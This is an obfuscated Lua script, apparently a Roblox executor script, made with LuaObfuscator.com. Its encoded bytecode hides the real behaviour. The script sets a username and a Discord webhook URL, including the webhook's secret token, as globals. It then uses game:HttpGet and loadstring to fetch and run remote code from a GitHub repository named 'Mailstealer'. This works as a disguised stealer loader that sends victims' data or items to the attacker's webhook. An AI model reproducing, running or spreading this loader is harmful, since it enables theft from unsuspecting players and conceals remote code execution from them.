--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v68=0;while true do if (v68==0) then v19=v0(v3(v30,1,1));return "";end end else local v69=0;local v70;while true do if (v69==0) then v70=v2(v0(v30,16));if v19 then local v101=0;local v102;while true do if (v101==1) then return v102;end if (v101==0) then v102=v5(v70,v19);v19=nil;v101=1;end end else return v70;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-((4 -3) + 0)) -(v32-((119 -(32 + 85)) -1))) + ((1606 + 32) -(1523 + 114)))) ;return v71-(v71%(620 -(555 + 64))) ;else local v72=(2 -0)^(v32-(932 -(857 + 17 + 57))) ;return (((v31%(v72 + v72))>=v72) and 1) or (568 -(367 + 201)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;return (v36 * (472 -216)) + v35 ;end local function v23()local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(351 -((1039 -(802 + 150)) + (707 -444)))) then return (v41 * 16777216) + (v40 * (65716 -(67 + 113))) + (v39 * (188 + (123 -55))) + v38 ;end if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + 1 ;v37=3 -2 ;end end end local function v24()local v42=v23();local v43=v23();local v44=3 -(1 + 1) ;local v45=(v20(v43,1 + 0 ,20) * (2^(14 + 18))) + v42 ;local v46=v20(v43,(360 + 658) -(915 + 82) ,87 -56 );local v47=((v20(v43,(904 -(261 + 624)) + 13 )==(439 -(145 + (520 -227)))) and  -(1 -(1080 -(1020 + 60)))) or (1188 -(1069 + 118)) ;if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else local v76=0 -0 ;while true do if (v76==(0 + 0)) then v46=792 -(368 + 423) ;v44=(1423 -(630 + 793)) -0 ;break;end end end elseif (v46==(1202 + 845)) then return ((v45==(0 -0)) and (v47 * ((3 -2)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1041 -(10 + 8)) ) * (v44 + (v45/((7 -5)^(494 -(416 + 26))))) ;end local function v25(v48)local v49=(0 + 0) -0 ;local v50;local v51;while true do if (v49==3) then return v6(v51);end if (v49==(4 -3)) then v50=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;v49=1 + 1 ;end if (v49==(6 -4)) then v51={};for v77=1, #v50 do v51[v77]=v2(v1(v3(v50,v77,v77)));end v49=1750 -(597 + 163 + 987) ;end if (v49==(1913 -(1789 + 124))) then v50=nil;if  not v48 then local v93=766 -(745 + 21) ;while true do if (v93==(0 + 0)) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=3 -2 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52~=(1694 -(37 + 1654))) then else v59=nil;v60=nil;v52=5 -1 ;end if (v52~=(0 -0)) then else v53=0;v54=nil;v52=1;end if (v52~=1) then else v55=nil;v56=nil;v52=2;end if (v52~=(1447 -(1290 + 155))) then else v57=nil;v58=nil;v52=4 -1 ;end if (v52==4) then while true do if ((1 + 1)==v53) then local v97=0;while true do if (v97==(1 -0)) then v53=3;break;end if (v97~=(65 -(30 + 35))) then else v58=nil;v59=nil;v97=1 + 0 ;end end end if ((1257 -(1043 + 214))~=v53) then else local v98=0 -0 ;local v99;while true do if (v98==(1212 -(323 + 889))) then v99=0 -0 ;while true do if (1==v99) then v53=1;break;end if ((580 -(361 + 219))~=v99) then else local v110=320 -(53 + 267) ;while true do if (v110==1) then v99=1;break;end if (v110==0) then v54=0 + 0 ;v55=nil;v110=1;end end end end break;end end end if (v53==(414 -(15 + 398))) then local v100=0;while true do if (v100==(983 -(18 + 964))) then v53=2;break;end if ((0 -0)==v100) then v56=nil;v57=nil;v100=1 + 0 ;end end end if (v53==(2 + 1)) then v60=nil;while true do local v103=0;local v104;local v105;while true do if (v103==1) then while true do if (v104~=0) then else v105=850 -(20 + 830) ;while true do if (v105~=(1 + 0)) then else if (0~=v54) then else local v158=0;local v159;while true do if (0~=v158) then else v159=0;while true do if (v159==0) then local v171=126 -(116 + 10) ;local v172;while true do if (v171==(0 + 0)) then v172=738 -(542 + 196) ;while true do if (v172~=(0 -0)) then else local v180=0;while true do if (v180==1) then v172=1;break;end if (v180==0) then v55={};v56={};v180=1 + 0 ;end end end if (v172==(1 + 0)) then v159=1 + 0 ;break;end end break;end end end if (1~=v159) then else v57={};v54=1;break;end end break;end end end if (v54==(7 -4)) then local v160=0 -0 ;local v161;while true do if (0~=v160) then else v161=0;while true do if (0==v161) then local v173=1551 -(1126 + 425) ;local v174;while true do if (0~=v173) then else v174=405 -(118 + 287) ;while true do if (v174~=(0 -0)) then else for v182=1122 -(118 + 1003) ,v23() do v56[v182-(2 -1) ]=v28();end return v58;end end break;end end end end break;end end end break;end if (v105==0) then local v148=0;local v149;while true do if (v148==(377 -(142 + 235))) then v149=0;while true do if (v149~=(0 -0)) then else if (v54==(1 + 0)) then local v175=0;local v176;local v177;while true do if (v175~=(978 -(553 + 424))) then else while true do if (v176==0) then v177=0;while true do if (v177==(0 -0)) then local v188=0 + 0 ;local v189;while true do if (v188==0) then v189=0 + 0 ;while true do if (v189==(1 + 0)) then v177=1;break;end if (v189==0) then v58={v55,v56,nil,v57};v59=v23();v189=2 -1 ;end end break;end end end if (v177~=1) then else v60={};v54=4 -2 ;break;end end break;end end break;end if (v175==0) then v176=0 + 0 ;v177=nil;v175=1;end end end if (v54==2) then local v178=0 -0 ;local v179;while true do if (v178==(753 -(239 + 514))) then v179=0 + 0 ;while true do if ((1329 -(797 + 532))==v179) then local v181=0;while true do if (v181~=0) then else local v190=0 + 0 ;while true do if (v190~=(0 + 0)) then else for v192=2 -1 ,v59 do local v193=1202 -(373 + 829) ;local v194;local v195;local v196;local v197;while true do if (v193==1) then v196=nil;v197=nil;v193=2;end if (2==v193) then while true do if ((732 -(476 + 255))==v194) then v197=nil;while true do if (0==v195) then v196=v21();v197=nil;v195=1;end if (v195==1) then if (v196==(1131 -(369 + 761))) then v197=v21()~=0 ;elseif (v196==(2 + 0)) then v197=v24();elseif (v196==3) then v197=v25();end v60[v192]=v197;break;end end break;end if (v194==0) then local v207=0 -0 ;while true do if (v207==(0 -0)) then v195=0;v196=nil;v207=239 -(64 + 174) ;end if (v207==1) then v194=1;break;end end end end break;end if (v193~=(0 + 0)) then else v194=0 -0 ;v195=nil;v193=1;end end end v58[3]=v21();v190=337 -(144 + 192) ;end if (v190==(217 -(42 + 174))) then v181=1 + 0 ;break;end end end if (v181~=(1 + 0)) then else v179=1 + 0 ;break;end end end if (v179==1) then for v184=1505 -(363 + 1141) ,v23() do local v185=1580 -(1183 + 397) ;local v186;local v187;while true do if (v185==(0 -0)) then v186=0;v187=nil;v185=1 + 0 ;end if (v185==1) then while true do if ((0 + 0)~=v186) then else v187=v21();if (v20(v187,1,1976 -(1913 + 62) )==(0 + 0)) then local v198=0 -0 ;local v199;local v200;local v201;while true do if (v198==2) then local v202=0;local v203;while true do if (v202~=(1933 -(565 + 1368))) then else v203=0 -0 ;while true do if (v203==1) then v198=1664 -(1477 + 184) ;break;end if (v203==(0 -0)) then local v211=0;while true do if (v211~=(0 + 0)) then else if (v20(v200,857 -(564 + 292) ,1)==(1 -0)) then v201[5 -3 ]=v60[v201[306 -(244 + 60) ]];end if (v20(v200,2,2 + 0 )~=1) then else v201[479 -(41 + 435) ]=v60[v201[1004 -(938 + 63) ]];end v211=1;end if ((1 + 0)~=v211) then else v203=1;break;end end end end break;end end end if (v198~=1) then else local v204=1125 -(936 + 189) ;local v205;while true do if (v204==0) then v205=0 + 0 ;while true do if (1~=v205) then else v198=2;break;end if ((1613 -(1565 + 48))==v205) then local v212=0 + 0 ;while true do if (v212==(1138 -(782 + 356))) then v201={v22(),v22(),nil,nil};if (v199==(0 -0)) then local v217=1092 -(975 + 117) ;local v218;local v219;while true do if (v217==1) then while true do if (v218~=0) then else v219=0;while true do if (v219~=(1875 -(157 + 1718))) then else v201[3]=v22();v201[4]=v22();break;end end break;end end break;end if (0~=v217) then else v218=0;v219=nil;v217=1 + 0 ;end end elseif (v199==(3 -2)) then v201[3]=v23();elseif (v199==2) then v201[3]=v23() -((6 -4)^(1034 -(697 + 321))) ;elseif (v199==3) then local v222=0;local v223;local v224;while true do if (0==v222) then local v227=0 -0 ;while true do if (v227==(1 -0)) then v222=1;break;end if (0==v227) then v223=0 -0 ;v224=nil;v227=1;end end end if (v222==(1 + 0)) then while true do if (v223~=0) then else v224=0;while true do if (v224==(0 -0)) then v201[7 -4 ]=v23() -((1229 -(322 + 905))^(627 -(602 + 9))) ;v201[4]=v22();break;end end break;end end break;end end end v212=1;end if ((1190 -(449 + 740))==v212) then v205=873 -(826 + 46) ;break;end end end end break;end end end if (v198~=(950 -(245 + 702))) then else if (v20(v200,9 -6 ,1 + 2 )==(1899 -(260 + 1638))) then v201[444 -(382 + 58) ]=v60[v201[4]];end v55[v184]=v201;break;end if (v198==0) then v199=v20(v187,6 -4 ,3);v200=v20(v187,4,6);v198=1 + 0 ;end end end break;end end break;end end end v54=3;break;end end break;end end end v149=1 -0 ;end if (v149~=1) then else v105=1;break;end end break;end end end end break;end end break;end if (0~=v103) then else v104=0 -0 ;v105=nil;v103=1;end end end break;end end break;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v79=v65;local v80=v66;local v81=v67;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v94=0,v87 do if (v94>=v81) then v85[v94-v81 ]=v86[v94 + 1 ];else v89[v94]=v86[v94 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=9) then if (v92<=4) then if (v92<=1) then if (v92==0) then v89[v91[2]]=v91[3];else v89[v91[2]]();end elseif (v92<=2) then v83=v91[3];elseif (v92>3) then local v130=0;local v131;local v132;while true do if (v130==1) then v89[v131 + 1 ]=v132;v89[v131]=v132[v91[4]];break;end if (v130==0) then v131=v91[2];v132=v89[v91[3]];v130=1;end end else local v133=0;local v134;while true do if (v133==0) then v134=v91[2];v89[v134]=v89[v134](v13(v89,v134 + 1 ,v84));break;end end end elseif (v92<=6) then if (v92==5) then v63[v91[3]]=v89[v91[2]];else v63[v91[3]]=v89[v91[2]];end elseif (v92<=7) then local v118=0;local v119;local v120;while true do if (v118==1) then v89[v119 + 1 ]=v120;v89[v119]=v120[v91[4]];break;end if (v118==0) then v119=v91[2];v120=v89[v91[3]];v118=1;end end elseif (v92==8) then v89[v91[2]]();else local v135=v91[2];local v136,v137=v82(v89[v135](v13(v89,v135 + 1 ,v91[3])));v84=(v137 + v135) -1 ;local v138=0;for v155=v135,v84 do v138=v138 + 1 ;v89[v155]=v136[v138];end end elseif (v92<=14) then if (v92<=11) then if (v92==10) then v89[v91[2]]=v63[v91[3]];elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=12) then local v123=v91[2];local v124,v125=v82(v89[v123](v13(v89,v123 + 1 ,v91[3])));v84=(v125 + v123) -1 ;local v126=0;for v127=v123,v84 do v126=v126 + 1 ;v89[v127]=v124[v126];end elseif (v92==13) then v89[v91[2]]=v91[3];else local v142=0;local v143;while true do if (0==v142) then v143=v91[2];v89[v143]=v89[v143](v13(v89,v143 + 1 ,v84));break;end end end elseif (v92<=16) then if (v92==15) then do return;end elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=17) then do return;end elseif (v92>18) then v89[v91[2]]=v63[v91[3]];else v83=v91[3];end v83=v83 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203063O007A65636D6972030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C65722F6D61696E2F656E67696E6503083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313633383633353433323330322O353134352F31627A5F2O6C497045546247535258524136697547353133326A50476D316A6C6F375F70724D31456E7757555063386A3334614C2O7853774E33435236424F7654364A4D00163O00120D3O00013O00260B3O000D000100020004123O000D000100120D000100043O001206000100033O001213000100053O001213000200063O00200400020002000700120D000400084O000C000200044O000E00013O00022O00080001000100010004123O0015000100260B3O0001000100010004123O0001000100120D000100043O001206000100093O00120D0001000B3O0012060001000A3O00120D3O00023O0004123O000100012O00113O00017O00",v9(),...);
